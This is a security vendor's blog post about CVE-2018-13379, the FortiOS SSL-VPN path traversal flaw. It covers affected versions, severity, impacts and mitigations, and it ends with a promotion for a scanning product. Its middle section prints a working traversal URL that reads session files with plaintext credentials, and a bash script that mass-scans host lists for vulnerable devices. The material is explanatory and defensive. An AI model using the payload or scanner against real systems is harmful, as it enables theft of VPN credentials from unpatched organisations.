A path traversal vulnerability allows hackers to create malicious resource requests to view restricted files and directories. In instances where there is an improper limitation of resource access, threat actors leverage path traversal vulnerabilities to access objects stored outside the website’s root folder. Also known as FortiOS vulnerability, CVE-2018-13379 is a path traversal vulnerability that affects older versions of Fortinet, FortiOS, and FortiProxy.
This blog post discusses how directory traversal attacks are exploited over the CVE-2018-13379 vulnerability, its impact, common exploitation techniques, and practices to prevent attacks.
What is the CVE-2018-13379 Vulnerability?
Appearing on the National Vulnerability Database as Improper Limitation of a Pathname to a Restricted Directory, the CVE-2018-13379 vulnerability is found in technology services that operate on Fortinet FortiOS versions 5.4.12 to 5.6, 5.6.3 to 5.6.7, and 6.0.0 to 6.0.4. The vulnerability also affects FortiOS devices that use the FortiProxy versions 1.0.0 to 1.0.7, 1.10 to 1.1.6, 1.2.0 to 1.2.8, and 2.0.0 under the SSL-VPN service. The vulnerability allows threat actors to download FortiOS system files using malformed resource requests, enabling them to read session files that contain plaintext credentials.
CVE-2018-13379 Attack Example
While the CVE-2018-13379 vulnerability was discovered in July 2018, threat actors continue to abuse the flaw as an entry point for deeper, organization-wide attacks. In a 2021 press release, Fortinet disclosed that a malicious actor disclosed sensitive binary files of approximately 87,000 FortiGate SSL-VPN devices. As the vulnerability is easy to exploit, basic attack techniques are typically enough to craft malformed requests for remote authentication or unauthenticated access to arbitrary files.
One of the most common exploitation techniques involves reading plaintext credentials from a web session file located at:
https://localhost/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
A shell script for this exploit would look similar to the following:
#!/bin/bash
cat hosts | parallel -j600 'request=$(timeout 10 curl -s -k https://{}/ |grep "remote" |grep -oP "/remote/login")
if [ "$request" == "/remote/login" ]
then
a=$(timeout 8 curl -kIs https://{}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession |grep -oP "200")
if [ "$a" == "200" ]
then
echo -e "{} - VULNERABLE"
echo -e "{}" >> vulnerable.txt
fi
else
echo -e "{} - X"
fi'
CVE-2018-13379 Vulnerability – Severity Level
CVE-2018-13379 is a pre-authentication vulnerability that allows a threat actor to read arbitrary files by sending specially crafted HTTP requests to FortiOS devices. The vulnerability was flagged as one of three advanced persistent threats (APT) actors in a joint cybersecurity advisory by the FBI and Cybersecurity and Infrastructure Security Agency (CISA). It was listed as one of the top 5 software security flaws affecting web applications in 2020. Since CVE-2018-13379 abuses a pre-authentication flaw, malicious actors do not require authentication credentials to perform exploits.
The CVE Numbering Authority (CNA), which provides a scoring table for common vulnerabilities (CVSS scores), attributed the CVE-2018-13379 with a vulnerability score of 9.1 (critical). The exposure has an impact score of 5.2 (high) and an exploitability score of 3.9 (moderate).
Key considerations of the CVE-2018-13379 vulnerability include:
- Requires zero privileges and minimum user interaction requirements to orchestrate an attack
- Low level of detectability
- Since the scope of the attack remains unchanged during the exploit, the attack blast radius remains limited
- Successful exploitation may lead to information disclosure through unauthenticated access to sensitive files
Impacts of Cyber Attacks Targeting CVE-2018-13379 Vulnerability
- Informational disclosure – Attackers leverage the path traversal vulnerability to compromise the confidentiality, integrity, and availability of internal resources relying on technological services
- Ransomware attacks – Exploiting the vulnerability to grab hold of sensitive files and threatening sensitive information leaks if the affected business fails to pay a ransom.
- Initial access – Using the pre-authentication flaw to gain initial access to a web service, steal user credentials and seize network services hosting other corporate resources.
- Denial of service – When hackers obtain unauthenticated access to domain admin credentials, they can turn off critical services and/or deny users from accessing internal resources.
CVE-2018-13379 Attack Prevention Techniques
Some approaches to prevent attacks targeting FortiOS systems include:
Disabling the SSL-VPN Service
A temporary workaround for securing FortiOS devices is to disable the SSL-VPN service under both tunnel and web modes. This can be achieved by using the following CLI commands:
config vpn ssl settings
unset source-interface
end
Quick note: For the above commands to execute appropriately, it is important to unset all firewall policies tied to the SSL service.
Multi-factor Authentication
Once a threat actor has compromised a device, they can gain access to sensitive files containing user credentials that can be used for future attacks. Two-factor authentication helps to mitigate these attacks, as an unauthenticated attacker cannot abuse the credentials obtained to impersonate legitimate users.
Upgrading to Recent FortiOS Versions
Fortinet is aware of the CVE-2018-13379 vulnerability and other APT actors and has introduced critical patches to its latest versions of FortiOS. Enterprises must upgrade to FortiOS version 5.4.13, 5.6.8, 6.0.5, and 6.2.0 or later to ensure their frameworks are not susceptible to inherent flaws.
Reset Compromised Passwords
Attackers typically abuse the CVE-2018-13379 vulnerability for harvesting credentials. Firms using affected versions of FortiOS and FortiProxy should treat all user passwords as compromised and perform an organization-wide password reset. The exercise renders all maliciously obtained passwords useless while ensuring new passwords are set to avoid credential abuse.
Continuous Vulnerability Scanning
As a recommended practice, organizations should implement an automated, continuous vulnerability scanning process to generate an understanding of inherent flaws, susceptible endpoints, and the tech stack’s overall attack surface. A comprehensive vulnerability scanner identifies the cybersecurity threats proactively, outlines vulnerability details, and sends an alert on exploitation attempts.
How Crashtest Security Helps Detect CVE-2018-13379 Vulnerability
The Crashtest Security Suite is an application scanning platform that powers cyber threat intelligence through automated vulnerability detection, advanced vulnerability assessments, and penetration testing. The security suite natively offers a privilege escalation scanner that identifies malicious privilege practices performed through APT actors. Crashtest Security additionally provides an HTTP header scanner to help detect special HTTP requests that threat actors can exploit to access internal resources illegally.
Through its SSL/TLS scanner, Crashtest Security also helps detect the CVE-2018-13379 vulnerability in FortyProxy’s SSL-VPN service. The suite integrates seamlessly with existing web development workflows to help developers detect a particular threat actor activity among various running transactions.
To know more about how Crashtest Security’s automated scanning and testing can help expedite the identification of critical vulnerabilities and reduce possibilities of attacks exploiting the CVE-2018-13379 vulnerability, try a 14-days, free demo here.